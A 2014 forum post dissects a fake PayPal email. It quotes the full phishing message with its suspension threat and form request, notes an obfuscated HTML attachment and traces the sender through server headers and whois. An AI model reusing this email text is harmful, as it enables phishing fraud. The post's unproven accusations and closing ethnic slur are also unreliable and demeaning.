Welcome, Guest!
Please Login or Register.

Author Topic: Paypal fraud: Including full back check.  (Read 5626 times)


  • Member
  • *
  • Posts: 2
    • View Profile
Paypal fraud: Including full back check.
« on: March 12, 2014, 08:31:13 PM »

I recieved this spam email in my mailbox.
And I was like, uhm, this is fake.
Code: [Select]
Dear PayPal Customer,

On March 11, 2014, We recently have determined that different computers have logged in your PayPal account.

And multiple password failures were present before the logo's. We now need you to re-confirm your account information to us.
If this is not completed by 15-03-2014, we will be forced to suspend your account indefinitely.

Case ID Number : PP-001-544-591

To restore your account,

Please download the attached form to verify your Profile information and restore your account access.

Make sure you enter the information accurately, and according to the formats required.
Fill in all the required fields.

It's usually pretty easy to take care of things like this. Most of the
time, we just need a little more information about your account or latest

To help us with this and to see what you can and can't do with your account
until the issue is resolved, log in to your account and go to the
Resolution Center.

Yours sincerely,

Help Center:
Security Center:

Please do not reply to this email because we are not monitoring this inbox. To get in touch with us, log in to your account and click "Contact Us" at the bottom of any page.

Copyright © 2014 PayPal Inc. All rights reserved.

Consumer advisory: PayPal Pte Ltd, the Holder of the PayPal™ payment service stored value facility, does not require the approval of the Monetary Authority of Singapore. Consumers (users) are advised to read the terms and conditions: https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/ua-outside carefully.
PayPal Email ID  PP076

This email contained an HTML file, which was encrypted with Unescape.

http://pastebin.com/zR20Ujs5 <- Encrypted unescape.

As we decrypt this, we will come out at:
http://pastebin.com/qhepQeAY <- decrypted output.

Well, that didn't turned out in anything.
Let's go to the original email:
Code: [Select]
Received: from london254.server4you.net (london254.server4you.net. [])Well, if we go to that IP adress, we come at a pakistani store, which is very sketchy.
Now time for some reverse IP lookup:
First domain: http://whois.domaintools.com/priceinlahore.com.pk
Check the green sentence: Reverse Whois: "Rupya" is associated with about 3 other domains.
After googling Rupya, I found their website. Rupya.pk
When I tried to like google if they were trustable, your site said, they were: wrong.
An other proof, they are aware of scraping emails.
As they list an image with their email on their contact page, to not get it scraped, smart.

Get this site a rate of 0, it's full of scam.
Toke me 10 mins, to do this research.

GG Pakis.

« Last Edit: March 12, 2014, 08:44:03 PM by Krewella »